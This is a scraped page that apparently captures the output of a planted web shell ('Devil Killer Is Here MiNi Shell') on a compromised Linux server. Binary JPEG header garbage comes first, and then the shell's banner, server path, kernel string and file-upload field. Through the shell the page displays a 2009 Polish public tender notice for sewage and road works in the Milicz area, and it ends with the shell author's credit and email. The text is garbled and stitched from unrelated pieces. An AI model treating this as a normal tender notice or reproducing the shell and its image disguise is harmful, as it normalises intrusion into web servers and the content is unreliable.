JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090410/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090410/102346-N-2009.html

<p class="kh_header"><b>Milicz: Uporządkowanie gospodarki ściekowej w zlewni rzeki Baryczy</b><br>
<b>Numer ogłoszenia: 102346 - 2009; data zamieszczenia: 10.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej "Dolina Baryczy" Sp. z o.o. , ul. Rynek 21, 56-300 Milicz, woj. dolnośląskie, tel. 071 3840987, faks 071 3840987.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgkdolinabaryczy.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.pgkdolinabaryczy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Uporządkowanie gospodarki ściekowej w zlewni rzeki Baryczy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie podzielone jest na części:
Część I - Budowa sieci kanalizacji sanitarnej w pasie drogi powiatowej 1440 D - odcinek Postolin-Pracze, będącą elementem kontraktu Budowa sieci kanalizacji sanitarnej w zlewni OŚ Sułów. Obejmuje m.in.: wykonanie wykopu i budowę sieci kanalizacji sanitarnej (ok 3585 m) wraz z przyłączami (ok. 42 szt.) i studzienkami (ok. 141szt.) oraz odtworzenie nawierzchni drogi na szerokości wykopu.
Część II Budowa sieci kanalizacji sanitarnej i deszczowej oraz dróg dla ul. Rolniczej i Piaskowej  w miejscowości Cieszków a) Zadanie nr 1 Budowa sieci kanalizacji sanitarnej dla ul. Rolniczej i Piaskowej w miejscowości Cieszków, będącą elementem kontraktu Budowa sieci kanalizacji sanitarnej w zlewni OŚ Zduny. Obejmuje m.in.: budowę sieci kanalizacji sanitarnej (ok. 1084 m) wraz ze studzienkami (ok. 74 szt. ) i przyłączami (ok. 41 szt.),b) Zadanie nr 2 Budowa dróg wraz z kanalizacją deszczową dla ulicy Rolniczej i Piaskowej w miejscowości Cieszków, będącą elementem zadania Budowa dróg gminnych na terenie centrum aktywności gospodarczej w miejscowości Cieszków, obejmująca budowę dróg wraz z chodnikami (ok. 920 m), budowę kanalizacji deszczowej (ok 920 m) wraz ze studzienkami (ok 34 szt.) Realizacja tej części stanowi wspólne zamówienie PGK Dolina Baryczy sp. z o.o. oraz Gminy Cieszków.
Część III - Przebudowa wewnętrznej sieci kanalizacyjnej na oczyszczalni ścieków w Miliczu, będącą elementem kontraktu Przebudowa i rozbudowa oczyszczalni ścieków w Miliczu. Obejmuje wykonanie nowej studni o średnicy 1000 mm wraz z kinetą  oraz wymianę odcinka wewnętrznej sieci kanalizacyjnej o średnicy 500 mm na długości ok. 15 m..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.23.31.20-6, 45.10.00.00-8, 45.11.12.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Część I - 60 000,00 PLN
Część II - 70 000,00 PLN, z czego 
Zadanie 1 - 15 000,00 PLN, 
Zadanie 2 - 50 000,00 PLN
część III - 500,00 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Posiadanie przez wykonawcę uprawnień do wykonywania działalności lub czynności objętych niniejszym zamówieniem oraz niepodleganie wykluczeniu z postępowania.
2.Posiadanie przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia (lub załączenie pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia ).
3. Znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 

Ocena spełniania warunków idbywać się będzie na zasadzie : spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający będzie żądał m.in złożenia:
1. Aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - potwierdzające uprawnienia do wykonywania działań lub czynności objętych niniejszym zamówieniem.
2. Aktualnej informacji z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie art. 24 ust. 1 pkt 4-8 ustawy Prawo Zamówień Publicznych. 
3. Aktualnej informacji z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby, w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy Prawo Zamówień Publicznych. 
4. Oświadczenia o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ustawy Prawo zamówień publicznych.
5. Oświadczenia o spelnianiu warunków udziału w postępowaniu na podstawie art. 22 ustawy Prawo zamówień publicznych.
6. Wykazu osób (sporządzonego wg wzoru), które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności.
7. Dokumentów potwierdzających wykonanie usługi, dla której podpisana została umowa o łącznej wartości na minimum 3 mln PLN (netto).
8. Dokumentów potwierdzających zapewnienie nadzoru kierownika budowy posiadającego stosowne uprawnienia budowlane wraz z potwierdzeniem przynależności do izby zawodowej techników i inżynierów budownictwa (uprawnienia budowlane, zaświadczenie i wykaz stażu). 
9. Udokumentowania posiadania rocznych obrotów w wysokości co najmniej 5 mln PLN
10. Ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z wykonaniem niniejszego zamówienia w kwocie co najmniej 1 mln PLN.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pgkdolinabaryczy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Gospodarki Komunalnej Dolina Baryczy sp. z o.o.
Rynek 21
56-300 Milicz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2009 godzina 12:30, miejsce: Przedsiębiorstwo Gospodarki Komunalnej Dolina Baryczy sp. z o.o.
Rynek 21
56-300 Milicz
Sekretariat II Piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 90 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedsięwzięcie Uporządkowanie gospodarki ściekowej w zlewni rzeki Baryczy planowane jest do  współfinansowania ze środków finansowych Funduszu Spójności Unii Europejskiej, realizowane w ramach Programu Operacyjnego Infrastruktura i Środowisko na lata 2007-2013..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa sieci kanalizacji sanitarnej w pasie drogi powiatowej 1440 D-odcinek Postolin-Pracze, element kontraktu Budowa sieci kanalizacji sanitarnej w zlewni OŚ Sułów..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowa sieci kanalizacji sanitarnej w pasie drogi powiatowej 1440 D-odcinek Postolin-Pracze, bedąca elementem kontraktu Budowa sieci kanalizacji sanitarnej w zlewni OŚ Sułów. Obejmuje m.in.: wykonanie wykopu i budowę sieci kanalizacji saniatrnej (o dł. ok. 3585 m) wraz z przyłączami (ok. 42 szt.) i studzienkami (ok. 141 szt.) oraz odtworzenie nawierzchni drogi na szerokości wykopu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.23.31.20-6, 45.10.00.00-8, 45.11.12.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa sieci kanalizacji sanitarnej i deszczowej oraz dróg dla ul. Rolniczej i Piaskowej w miejscowości Cieszków.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)Budowa sieci kanalizacji sanitarnej dla ul. Rolniczej i Piaskowej w miejscowości Cieszków bedąca elementem kontraktu Budowa sieci kanalizacji sanitarnej w zlewni OŚ Zduny. Obemuje m.in.: budowę sieci kanalizacji sanitarnej o łącznej dł. ok. 1084 m wraz ze studzienkami (ok. 74) i przyłączami (ok. 41 szt.)
b) Budowa dróg wraz z kanalizacją deszczową dla ulicy Rolniczej i Piaskowej w miejscowości Cieszków, bedąca elementem zadania Budowa dróg gminnych na terenie centrum aktywności gospodarczej w miejscowości Cieszków obejmująca budowę dróg wraz z chodnikami na dł. ok. 920 m, budowę kanalizacji deszczowej o dł. 920 m wraz ze studzienkami (34 szt). Realizacja tej części stanowi wspólne zamówienie PGK Dolina Baryczy sp. z o.o. oraz Gminy Cieszków..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.23.31.20-6, 45.10.00.00-8, 45.11.12.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przebudowa wewnętrznej sieci kanalizacyjnej na oczyszczalni ścieków w Miliczu element kontraktu: Przebudowa i rozbudowa oczyszczalni ścieków w Miliczu..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowa wewnętrznej sieci kanalizacyjnej na oczyszczalni ścieków w Miliczu element kontraktu Przebudowa i rozbudowa oczyszczalni ścieków w Miliczu.
Obejmuje wykonanie nowej studni o średnicy 1000 mm wraz z kinetą  oraz wymianę odcinka wewnętrznej sieci kanalizacyjnej o średnicy 500 mm na długości ok. 15 m..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.23.31.20-6, 45.10.00.00-8, 45.11.12.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com